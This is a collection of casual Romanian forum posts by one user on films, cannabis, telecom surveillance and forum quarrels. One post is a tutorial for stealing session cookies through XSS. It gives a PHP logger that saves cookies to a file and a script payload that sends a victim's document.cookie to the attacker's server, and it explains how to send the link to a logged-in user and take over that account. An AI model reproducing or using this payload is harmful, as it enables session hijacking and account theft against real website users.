crs12decoder

1) nu sunt nub si te rog frumos sa nu te mai legi de mine. Daca ai ceva frumos de zis, zi daca nu, abtine-te si nu ma mai jignii.. deja m-am saturat cate rahaturi ai zis si eu am tacut. Eu nu m-am legat de tine in niciun fel si te rog sa faci si tu de asemenea. Nu oblig pe nimeni sa ma placa da nu-mi place sa fiu jignit ok? 2) e scris de mine cap-coada.. . Daca era copy-paste de undeva mentionam sursa. nu sunt genu care se lauda cu munca altuia. Personal nu ma intereseaza parerea lu' codex despre mine atata timp cat stiu ce e al meu. Mi s-a parut ca majoritatea tutorialelor sunt explicate intr-un mod mai greoi si multi incepatori pun intrebari ori pentru ca nu cauta, ori pentru ca nu inteleg... atata tot.. ar trebui sa fie selectionat unu dintre tutoriale si sa fie postat undeva pe forum unde va fi mai vizibil pentru ca sunt sigur ca cel putin 60% din cei care se uita pe forum nu au idee cum se extrage un xss in concret cam asta era ideeasper ca de acum vei inceta cu jignirile.

Marea majoritate ce gasesc posturi ale altor useri de pe acest forum si nu numai, ce contin site-uri vulnerabile la xss, isi pun intrebarea cu ce ii ajuta si cum se extrag. XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele. Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis. Presupunem ca aveti www.site-ulmeu.com. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php: <?php $cookie = $HTTP_GET_VARS["cgrab"]; $fh = fopen('cookies.txt', 'a'); fwrite($fh, $cookie . "\n\n"); ?> Uneori anumite servere nu permit crearea fisierului cookies.txt in cazul in care acesta nu exista, asa ca e bine sa-l creati voi, creati un fisier denumit "cookies.txt" si aveti grija ca acesta sa aiba drepturi de read si write. Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma <script>alert('xss')</script>. Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta: <script>document.location="http://www.site-ulmeu.com/grab.php?cgrab=" + document.cookie;</script> trimiteti link-ul cu xss-ul unui anumit user(care voi credeti ca este logat) iar cookie-ul va fi salvat in http://www.site-ulmeu.com/cookies.txt trebuie doar sa le luati si sa le adaugati in folderul cookies de la internet explorer sau sa le inlocuiti cu cele actuale. Astfel veti fi logat cu sesiunea victimei si veti avea drepturi depline asupra contului sau.

mai bine iti faci tu propriul algoritm de criptare.. stii sigur ca sunt sanse minime sa fie decriptat

tf tf tf ) pt un amarat de xss? pun pariu ca habar n-au ce i-a lovit macar

da careva?

so fucking what... nu vedeti ce fata are? la ce altceva v-ati putea astepta de la el.. nu mi se pare nimic amuzant

http://economie.hotnews.ro/stiri-telecom-2405825-furnizorii-telefonie-internet-vor-arhiva-date-despre-convorbirile-abonatilor.htm ok.. ideea de baza e ca toate serviciile de telecomunicatii/internet vor salva arhivele cu toate convorbirile tuturor... eu,tu,el...toti... ele pot fi accesate oricand de baietii cu ochelari negri si cu costum.. si cu o casca in ureche... probabil unii ati vazut si la mircea badea.. ca a zis intr-o seara... so.. sa zicem ca tu vorbesti despre kestii nasoale.. gen... ceva .gov hacking sau kestii in genu... si un tip da un search la "hacking" in baza de date (presupun ca poate normal..) si te vede pe tine.. si dupaia iti urmaresc telefonu si tot ce scrii pe net.. tot... verifica inclusiv din arhiva.. si daca e ceva nasol te trezesti cu "the big boys" la usa... e chiar naspa.. adica faza nu poate fi evitata... singura cheste ar fi de ex daca vorbesti cu cineva pe Instant messaging tre sa folosesti un algoritm de criptare care trimite datele criptate catre prietenu ala al tau cu care vorbesti si clientu lui le decripteaza si le citeste... asa tot ce e salvat in arhivele alora sunt niste "isudhgfksgdfksbdhfkbsdlkf"

dude.. din ce tzara ziceai ca esti?.. sigur din romania?...? te doare mana sa folosesti un proxy sau in cazu meu sa dai un restart la modem si sa iti creezi 5 mailuri diferite si eventual 5 cookie clear-uri? sincer sa fiu pe mine da .. de aia sunt curios sa vad daca merge.. daca stiu sigur ca merge m-as apuca sa fac toate astea pt un cont pe o luna

hmm ... e pe bune? http://premiumforfree.com mi-am facut cont de curiozitate.. in general mi-e frica de spam asa ca am folosit alt mail decat ala obisnuit pt k nu-mi mirosea prea bine... imi spune sa le completez niste formulare(care clar contin mailu meu). ideea care ma intriga a fost cand am citit detaliile: Just enter your email address and confrim it by clicking hte link emailed to you. No credit card required. You will be credited within 5 business days Completing this offer counts as a 1/2 offer credit 5 zile lucratoare? de ce? ... mi-a fost prea lene sa ma apuc si sa completez si sa tralala sa astept 5 zile si presimt ca le-as astepta aiurea.. dar totusi.. a incercat cineva?

imi place cum gandesti hmm m-am uitat la filmu ala.. pot spune ca e... foarte fain... nu tocmai ce ma asteptam da are o alta latura super. Ideea e ca tot ceea ce-ti place creeaza dependenta... chiar si surfingul'.. la fel cum unii dintre noi suntem dependenti de calculatoare, altii sunt dependenti de valuri, weed, ski si tot ceea ce-ti creeaza senzatia de fericire. it's cool

hmm ma apuc de surfer dude ... ca venii vorba.. dak ar fi sa alegeti intre o tipa super buna si 5 joint-uri cu original mega extra ulta good shit... ce-ati alege?

Nu exista subiectul sau mesajul cautat oricum.. misto parazitii

da.. mi-a sters adminu postu era oricum tot un xss implementat tot prin iframe ca al tau

nah http://all4u.forumers.ro/tutoriale-hack-f48/tutorial-php-t581.htm ca sa nu ma las mai prejos presupun ca ti-ai dat seama de xss pentru ca ai vazut ca forumu muistului aluia interpreta html pt ca-ti apareau casutele de text in loc de codu html

godfather locu' 1?.. spre rusinea mea nu l-am vazut.. mi s-a parut plictisitor asta pentru ca era vechi... si am zis ca nu ma uit la el.. poate o sa ma uit la el intr-o zi

http://lineman.net/etc/passwd/passwd.html mesaj lasat de makeru site-ului pt de-ai ca mine )

am citit Isaac Asimov... e genial rusu... ok la requiem for a dream ma refer la environment nu la felu' cum joaca actorii.. ca de jucat joaca excelent

nu.. doar nu crezi ca-mi dau date reale pe net ce cacat .. am bagat la deruta

eh.. mai umfla acolo cate un punct si ei... doar suntem in romania ce naiba

cosmin.. sa ineleg ca sub scratch-uiala de la primu tab aveai un xxx hmm.. are careva idee ce fel de ip-uri contorizeaza astia aici? http://alonia.ro/inc/hits.txt

ok.. dawg.. am vazut requirem for a dream... damn that shit is.. well.. it's crap crazy... bine eu ma refeream la weed shits... nu la drug shits.. adica e o diferenta mare... nu stiti mel de la parazitii "drogurile schimba tot" .. iarba se exclude... aia acolo isi bagau pastile, hero coca tot tacamu... bine ca e foarte realist filmu.. drogurile chiar te fut urat de tot... te rup... da ma refeream la ceva funny cu iarba... nu la .. droguri,droguri... doamne si filmu arata ca pula... adica no offence dar e crap cand ma gandesc ca a avut un buget de $4.500.000 .. 4.5 mil de coco esti nebun la cap? voi ati vazut cum arata filmu? zici ca esti in romania pe imdb au luat 8.5/10 .. doamne cand ma gandesc ca i robot a luat 7... si ii da flush lu requiem for a dream.. adica nu zic nimic.. filmu e foarte puternic.. psihologic.. o iei razna numai cand te uiti la el...dar e deja exagerat in orice caz.. cand ziceam filme cu distrusi, ma refeream la distrusi in sensu amuzant al cuvantului.. nu in sensul propriu.. negativ..

damn.. ma enerveaza ca pe forumu alora nu poti sa te uiti la posturi dekt dak te inregistrezi la musiti... ce naiba

wtf this is sick.. :D like it

am precizat la inceput.. knocked up ---- oo da ms de posturi.. le anal-izez si asa n-am ce face weekendu asta :D3 are cumva ca soundtrack melodia lux aeterna() a lu clint mansell?

sal... ma uitam azi la "knocked up".. un film cu un tip care o fute pe una cand erau morti de beti si fara sa vrea fac un copil si tralala.. in fine.. nu e vb despre asta... e vb despre faptu ca grupu aluia era format numai din distrusi amuzanti... imi plac fazele astea... imi amintesc o faza din film in care vine un cutremur si ala care fuma iarba zice "oh fucking shit" si mai vine unu din baie sarind pe acolo zicand "oh my god it's the russians" si ies toti afara.. unu dintre ei era speriat mort si altu care era dezbracat si isi acoperea pula il linistea si mai arata o imagine cu un tip care ii acoperea lu nevasta'sa sanii ca si ea era dezbracata.. si kestii de genu ... am ras cu lacrimi alte filme cu distrusi sau weed stiti?